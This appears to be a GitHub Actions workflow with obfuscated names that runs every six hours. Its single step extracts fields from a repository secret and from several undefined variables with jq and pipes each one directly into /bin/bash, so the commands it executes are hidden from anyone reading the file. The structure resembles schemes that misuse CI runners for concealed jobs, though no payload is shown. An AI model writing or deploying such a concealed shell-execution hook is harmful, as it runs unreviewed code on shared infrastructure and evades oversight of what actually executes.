name: zhongxiaoyan3456

on:
  workflow_dispatch:
  schedule:
    - cron: '33 2/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: zhongxiaoyan3456
        env:
          cmq396: ${{ secrets.cmq396 }}
        run: |
          echo $cmq396 | jq -r .a417 | /bin/bash
          echo $bmqy11 | jq -r .bzgbj86495 | /bin/bash
          echo $pc19263 | jq -r .tuxor3 | /bin/bash
          echo $hb2033 | jq -r .et409 | /bin/bash
          echo $csbh30033 | jq -r .cmqko6 | /bin/bash
          echo $s8574 | jq -r .ohabe1 | /bin/bash
          echo $bdel481 | jq -r .ob8142 | /bin/bash

